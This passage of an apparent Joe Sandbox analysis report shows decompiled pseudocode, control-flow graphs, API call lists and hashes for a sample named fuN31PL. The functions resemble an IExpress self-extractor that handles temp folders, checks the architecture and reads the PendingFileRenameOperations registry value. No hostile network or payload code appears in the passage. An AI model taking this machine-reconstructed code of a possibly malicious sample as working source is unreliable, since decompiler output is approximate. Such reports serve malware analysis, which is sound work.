                                                                                                                                                                                                                                              0x001a545f
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 001A171E: _vsnprintf.MSVCRT ref: 001A1750
                                                                                                                                                                                                                                              • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A53FB
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A5402
                                                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A541F
                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A542B
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A5434
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A5452
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                              • API String ID: 1082909758-957705000
                                                                                                                                                                                                                                              • Opcode ID: 7fcda86d06a4b404a41701d60ed164983ab346a1318396e06b5e96d0f80a6153
                                                                                                                                                                                                                                              • Instruction ID: b9b2b1add617a0a35df640ef7711ca424543fc1b56b6656dce32ca519b3d7809
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7fcda86d06a4b404a41701d60ed164983ab346a1318396e06b5e96d0f80a6153
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA11317570460077D7209F329C08FAF3A6EEFD7321F400024B606C2590DF748D82C6A2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 522 1a5467-1a5484 523 1a548a-1a5490 call 1a53a1 522->523 524 1a551c-1a5528 call 1a1680 522->524 527 1a5495-1a5497 523->527 528 1a552d-1a5539 call 1a58c8 524->528 529 1a549d-1a54c0 call 1a1781 527->529 530 1a5581-1a5583 527->530 535 1a553b-1a5545 CreateDirectoryA 528->535 536 1a554d-1a5552 528->536 544 1a550c-1a551a call 1a658a 529->544 545 1a54c2-1a54d8 GetSystemInfo 529->545 534 1a558d-1a559d call 1a6ce0 530->534 540 1a5577-1a557c call 1a6285 535->540 541 1a5547 535->541 542 1a5554-1a5557 call 1a597d 536->542 543 1a5585-1a558b 536->543 540->530 541->536 553 1a555c-1a555e 542->553 543->534 544->528 546 1a54da-1a54dd 545->546 547 1a54fe 545->547 551 1a54df-1a54e2 546->551 552 1a54f7-1a54fc 546->552 554 1a5503-1a5507 call 1a658a 547->554 557 1a54f0-1a54f5 551->557 558 1a54e4-1a54e7 551->558 552->554 553->543 559 1a5560-1a5566 553->559 554->544 557->554 558->544 561 1a54e9-1a54ee 558->561 559->530 562 1a5568-1a5575 RemoveDirectoryA 559->562 561->554 562->530
                                                                                                                                                                                                                                              C-Code - Quality: 75%
                                                                                                                                                                                                                                              			E001A5467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t10;
                                                                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                                                                              				intOrPtr _t14;
                                                                                                                                                                                                                                              				void* _t16;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				signed int _t26;
                                                                                                                                                                                                                                              				void* _t28;
                                                                                                                                                                                                                                              				void* _t29;
                                                                                                                                                                                                                                              				CHAR* _t48;
                                                                                                                                                                                                                                              				signed int _t49;
                                                                                                                                                                                                                                              				intOrPtr _t61;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t10 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				if(__edx == 0) {
                                                                                                                                                                                                                                              					_t48 = 0x1a91e4;
                                                                                                                                                                                                                                              					_t42 = 0x104;
                                                                                                                                                                                                                                              					E001A1680(0x1a91e4, 0x104);
                                                                                                                                                                                                                                              					L14:
                                                                                                                                                                                                                                              					_t13 = E001A58C8(_t48); // executed
                                                                                                                                                                                                                                              					if(_t13 != 0) {
                                                                                                                                                                                                                                              						L17:
                                                                                                                                                                                                                                              						_t42 = _a4;
                                                                                                                                                                                                                                              						if(_a4 == 0) {
                                                                                                                                                                                                                                              							L23:
                                                                                                                                                                                                                                              							 *0x1a9124 = 0;
                                                                                                                                                                                                                                              							_t14 = 1;
                                                                                                                                                                                                                                              							L24:
                                                                                                                                                                                                                                              							return E001A6CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t16 = E001A597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                                                              						if(_t16 != 0) {
                                                                                                                                                                                                                                              							goto L23;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t61 =  *0x1a8a20; // 0x0
                                                                                                                                                                                                                                              						if(_t61 != 0) {
                                                                                                                                                                                                                                              							 *0x1a8a20 = 0;
                                                                                                                                                                                                                                              							RemoveDirectoryA(_t48);
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L22:
                                                                                                                                                                                                                                              						_t14 = 0;
                                                                                                                                                                                                                                              						goto L24;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                                                              						 *0x1a9124 = E001A6285();
                                                                                                                                                                                                                                              						goto L22;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					 *0x1a8a20 = 1;
                                                                                                                                                                                                                                              					goto L17;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t42 =  &_v268;
                                                                                                                                                                                                                                              				_t20 = E001A53A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                                                              				if(_t20 == 0) {
                                                                                                                                                                                                                                              					goto L22;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_t48 = 0x1a91e4;
                                                                                                                                                                                                                                              				E001A1781(0x1a91e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                                                              				if(( *0x1a9a34 & 0x00000020) == 0) {
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					_t42 = 0x104;
                                                                                                                                                                                                                                              					E001A658A(_t48, 0x104, 0x1a1140);
                                                                                                                                                                                                                                              					goto L14;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				GetSystemInfo( &_v304);
                                                                                                                                                                                                                                              				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                                                              				if(_t26 == 0) {
                                                                                                                                                                                                                                              					_push("i386");
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					E001A658A(_t48, 0x104);
                                                                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t28 = _t26 - 1;
                                                                                                                                                                                                                                              				if(_t28 == 0) {
                                                                                                                                                                                                                                              					_push("mips");
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t29 = _t28 - 1;
                                                                                                                                                                                                                                              				if(_t29 == 0) {
                                                                                                                                                                                                                                              					_push("alpha");
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if(_t29 != 1) {
                                                                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_push("ppc");
                                                                                                                                                                                                                                              				goto L11;
                                                                                                                                                                                                                                              			}




















                                                                                                                                                                                                                                              0x001a5472
                                                                                                                                                                                                                                              0x001a5479
                                                                                                                                                                                                                                              0x001a5481
                                                                                                                                                                                                                                              0x001a5484
                                                                                                                                                                                                                                              0x001a551c
                                                                                                                                                                                                                                              0x001a5521
                                                                                                                                                                                                                                              0x001a5528
                                                                                                                                                                                                                                              0x001a552d
                                                                                                                                                                                                                                              0x001a552f
                                                                                                                                                                                                                                              0x001a5539
                                                                                                                                                                                                                                              0x001a554d
                                                                                                                                                                                                                                              0x001a554d
                                                                                                                                                                                                                                              0x001a5552
                                                                                                                                                                                                                                              0x001a5585
                                                                                                                                                                                                                                              0x001a5585
                                                                                                                                                                                                                                              0x001a558b
                                                                                                                                                                                                                                              0x001a558d
                                                                                                                                                                                                                                              0x001a559d
                                                                                                                                                                                                                                              0x001a559d
                                                                                                                                                                                                                                              0x001a5557
                                                                                                                                                                                                                                              0x001a555e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5560
                                                                                                                                                                                                                                              0x001a5566
                                                                                                                                                                                                                                              0x001a5569
                                                                                                                                                                                                                                              0x001a556f
                                                                                                                                                                                                                                              0x001a556f
                                                                                                                                                                                                                                              0x001a5581
                                                                                                                                                                                                                                              0x001a5581
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5581
                                                                                                                                                                                                                                              0x001a5545
                                                                                                                                                                                                                                              0x001a557c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a557c
                                                                                                                                                                                                                                              0x001a5547
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5547
                                                                                                                                                                                                                                              0x001a548a
                                                                                                                                                                                                                                              0x001a5490
                                                                                                                                                                                                                                              0x001a5497
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a549d
                                                                                                                                                                                                                                              0x001a54ab
                                                                                                                                                                                                                                              0x001a54b4
                                                                                                                                                                                                                                              0x001a54c0
                                                                                                                                                                                                                                              0x001a550c
                                                                                                                                                                                                                                              0x001a5511
                                                                                                                                                                                                                                              0x001a5515
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5515
                                                                                                                                                                                                                                              0x001a54c9
                                                                                                                                                                                                                                              0x001a54d6
                                                                                                                                                                                                                                              0x001a54d8
                                                                                                                                                                                                                                              0x001a54fe
                                                                                                                                                                                                                                              0x001a5503
                                                                                                                                                                                                                                              0x001a5507
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a5507
                                                                                                                                                                                                                                              0x001a54da
                                                                                                                                                                                                                                              0x001a54dd
                                                                                                                                                                                                                                              0x001a54f7
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a54f7
                                                                                                                                                                                                                                              0x001a54df
                                                                                                                                                                                                                                              0x001a54e2
                                                                                                                                                                                                                                              0x001a54f0
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a54f0
                                                                                                                                                                                                                                              0x001a54e7
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a54e9
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A54C9
                                                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A553D
                                                                                                                                                                                                                                              • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A556F
                                                                                                                                                                                                                                                • Part of subcall function 001A53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A53FB
                                                                                                                                                                                                                                                • Part of subcall function 001A53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A5402
                                                                                                                                                                                                                                                • Part of subcall function 001A53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A541F
                                                                                                                                                                                                                                                • Part of subcall function 001A53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A542B
                                                                                                                                                                                                                                                • Part of subcall function 001A53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A5434
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                                                              • API String ID: 1979080616-772166365
                                                                                                                                                                                                                                              • Opcode ID: 466f2d04c97931dd51b7ed9852b5345299cbb06be3f0bb21155e9cc41f34ed04
                                                                                                                                                                                                                                              • Instruction ID: 7770fcd0acac24a9eb8e2367dd9141ea618f8edac6231762df4110c7cf000d8c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 466f2d04c97931dd51b7ed9852b5345299cbb06be3f0bb21155e9cc41f34ed04
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 583127BDF08A106BCB159F299D4497F77ABAF93760F04012AB802D3950EB70CE818A91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 563 1a256d-1a257d 564 1a2622-1a2627 call 1a24e0 563->564 565 1a2583-1a2589 563->565 570 1a2629-1a262f 564->570 567 1a258b 565->567 568 1a25e8-1a2607 RegOpenKeyExA 565->568 567->570 571 1a2591-1a2595 567->571 572 1a2609-1a2620 RegQueryInfoKeyA 568->572 573 1a25e3-1a25e6 568->573 571->570 575 1a259b-1a25ba RegOpenKeyExA 571->575 574 1a25d1-1a25dd RegCloseKey 572->574 573->570 574->573 575->573 576 1a25bc-1a25cb RegQueryValueExA 575->576 576->574
                                                                                                                                                                                                                                              C-Code - Quality: 86%
                                                                                                                                                                                                                                              			E001A256D(signed int __ecx) {
                                                                                                                                                                                                                                              				int _v8;
                                                                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                                                                              				signed int _t19;
                                                                                                                                                                                                                                              				long _t24;
                                                                                                                                                                                                                                              				void* _t26;
                                                                                                                                                                                                                                              				int _t31;
                                                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                                                              				_t31 = 0;
                                                                                                                                                                                                                                              				if(_t13 == 0) {
                                                                                                                                                                                                                                              					_t31 = E001A24E0(_t26);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t34 = _t13 - 1;
                                                                                                                                                                                                                                              					if(_t34 == 0) {
                                                                                                                                                                                                                                              						_v8 = 0;
                                                                                                                                                                                                                                              						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                                                              							goto L7;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                                                              							goto L6;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						L12:
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                                                              							_v8 = 0;
                                                                                                                                                                                                                                              							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                                                              							if(_t24 == 0) {
                                                                                                                                                                                                                                              								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                              								L6:
                                                                                                                                                                                                                                              								asm("sbb eax, eax");
                                                                                                                                                                                                                                              								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                                                              								RegCloseKey(_v12); // executed
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							L7:
                                                                                                                                                                                                                                              							_t31 = _v8;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t31;
                                                                                                                                                                                                                                              				goto L12;
                                                                                                                                                                                                                                              			}











                                                                                                                                                                                                                                              0x001a2572
                                                                                                                                                                                                                                              0x001a2573
                                                                                                                                                                                                                                              0x001a2575
                                                                                                                                                                                                                                              0x001a2578
                                                                                                                                                                                                                                              0x001a257d
                                                                                                                                                                                                                                              0x001a2627
                                                                                                                                                                                                                                              0x001a2583
                                                                                                                                                                                                                                              0x001a2586
                                                                                                                                                                                                                                              0x001a2589
                                                                                                                                                                                                                                              0x001a25eb
                                                                                                                                                                                                                                              0x001a2607
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a2609
                                                                                                                                                                                                                                              0x001a261a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a261a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a258b
                                                                                                                                                                                                                                              0x001a258b
                                                                                                                                                                                                                                              0x001a259e
                                                                                                                                                                                                                                              0x001a25b2
                                                                                                                                                                                                                                              0x001a25ba
                                                                                                                                                                                                                                              0x001a25cb
                                                                                                                                                                                                                                              0x001a25d1
                                                                                                                                                                                                                                              0x001a25d6
                                                                                                                                                                                                                                              0x001a25da
                                                                                                                                                                                                                                              0x001a25dd
                                                                                                                                                                                                                                              0x001a25dd
                                                                                                                                                                                                                                              0x001a25e3
                                                                                                                                                                                                                                              0x001a25e3
                                                                                                                                                                                                                                              0x001a25e3
                                                                                                                                                                                                                                              0x001a258b
                                                                                                                                                                                                                                              0x001a2589
                                                                                                                                                                                                                                              0x001a262f
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,001A4096,001A4096,?,001A1ED3,00000001,00000000,?,?,001A4137,?), ref: 001A25B2
                                                                                                                                                                                                                                              • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,001A4096,?,001A1ED3,00000001,00000000,?,?,001A4137,?,001A4096), ref: 001A25CB
                                                                                                                                                                                                                                              • RegCloseKey.KERNELBASE(?,?,001A1ED3,00000001,00000000,?,?,001A4137,?,001A4096), ref: 001A25DD
                                                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,001A4096,001A4096,?,001A1ED3,00000001,00000000,?,?,001A4137,?), ref: 001A25FF
                                                                                                                                                                                                                                              • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,001A4096,00000000,00000000,00000000,00000000,?,001A1ED3,00000001,00000000), ref: 001A261A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • PendingFileRenameOperations, xrefs: 001A25C3
                                                                                                                                                                                                                                              • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 001A25F5
                                                                                                                                                                                                                                              • System\CurrentControlSet\Control\Session Manager, xrefs: 001A25A8
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                                                              • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                                                              • API String ID: 2209512893-559176071
                                                                                                                                                                                                                                              • Opcode ID: 95c2d6ddbe116d426cdd8ee4a15b1d897621120aabf45f548276a43e13e73f5d
                                                                                                                                                                                                                                              • Instruction ID: 3f42c35c9ee2fa6ea50bf840fc718341ef705d483a2c6c04c61964e3e83f097c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95c2d6ddbe116d426cdd8ee4a15b1d897621120aabf45f548276a43e13e73f5d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 43114C79D42228BBDB209B969D09DFBBE7CEF177A1F504055F808A2010DB305E49E6A1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 577 1a6a60-1a6a91 call 1a7155 call 1a7208 GetStartupInfoW 583 1a6a93-1a6aa2 577->583 584 1a6abc-1a6abe 583->584 585 1a6aa4-1a6aa6 583->585 588 1a6abf-1a6ac5 584->588 586 1a6aa8-1a6aad 585->586 587 1a6aaf-1a6aba Sleep 585->587 586->588 587->583 589 1a6ad1-1a6ad7 588->589 590 1a6ac7-1a6acf _amsg_exit 588->590 592 1a6ad9-1a6ae9 call 1a6c3f 589->592 593 1a6b05 589->593 591 1a6b0b-1a6b11 590->591 595 1a6b2e-1a6b30 591->595 596 1a6b13-1a6b24 _initterm 591->596 597 1a6aee-1a6af2 592->597 593->591 598 1a6b3b-1a6b42 595->598 599 1a6b32-1a6b39 595->599 596->595 597->591 602 1a6af4-1a6b00 597->602 600 1a6b67-1a6b71 598->600 601 1a6b44-1a6b51 call 1a7060 598->601 599->598 604 1a6b74-1a6b79 600->604 601->600 610 1a6b53-1a6b65 601->610 605 1a6c39-1a6c3e call 1a724d 602->605 608 1a6b7b-1a6b7d 604->608 609 1a6bc5-1a6bc8 604->609 614 1a6b7f-1a6b81 608->614 615 1a6b94-1a6b98 608->615 611 1a6bca-1a6bd3 609->611 612 1a6bd6-1a6be3 _ismbblead 609->612 610->600 611->612 616 1a6be9-1a6bed 612->616 617 1a6be5-1a6be6 612->617 614->609 618 1a6b83-1a6b85 614->618 619 1a6b9a-1a6b9e 615->619 620 1a6ba0-1a6ba2 615->620 616->604 623 1a6c1e-1a6c25 616->623 617->616 618->615 624 1a6b87-1a6b8a 618->624 621 1a6ba3-1a6bbc call 1a2bfb 619->621 620->621 621->623 630 1a6bbe-1a6bbf exit 621->630 626 1a6c32 623->626 627 1a6c27-1a6c2d _cexit 623->627 624->615 628 1a6b8c-1a6b92 624->628 626->605 627->626 628->618 630->609
                                                                                                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                                                                                                              			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                              				signed int* _t25;
                                                                                                                                                                                                                                              				signed int _t26;
                                                                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				signed int _t37;
                                                                                                                                                                                                                                              				signed char _t41;
                                                                                                                                                                                                                                              				signed int _t53;
                                                                                                                                                                                                                                              				signed int _t54;
                                                                                                                                                                                                                                              				intOrPtr _t56;
                                                                                                                                                                                                                                              				signed int _t58;
                                                                                                                                                                                                                                              				signed int _t59;
                                                                                                                                                                                                                                              				intOrPtr* _t60;
                                                                                                                                                                                                                                              				void* _t62;
                                                                                                                                                                                                                                              				void* _t67;
                                                                                                                                                                                                                                              				void* _t68;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				E001A7155();
                                                                                                                                                                                                                                              				_push(0x58);
                                                                                                                                                                                                                                              				_push(0x1a72b8);
                                                                                                                                                                                                                                              				E001A7208(__ebx, __edi, __esi);
                                                                                                                                                                                                                                              				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                                                              				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                                                              				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                                                              				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                                                              				_t53 = 0;
                                                                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                                                                              					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                                                              					if(0 == 0) {
                                                                                                                                                                                                                                              						break;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					if(0 != _t56) {
                                                                                                                                                                                                                                              						Sleep(0x3e8);
                                                                                                                                                                                                                                              						continue;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_t58 = 1;
                                                                                                                                                                                                                                              						_t53 = 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L7:
                                                                                                                                                                                                                                              					_t67 =  *0x1a88b0 - _t58; // 0x2
                                                                                                                                                                                                                                              					if(_t67 != 0) {
                                                                                                                                                                                                                                              						__eflags =  *0x1a88b0; // 0x2
                                                                                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                                                                                              							 *0x1a81e4 = _t58;
                                                                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                                                                              						} else {
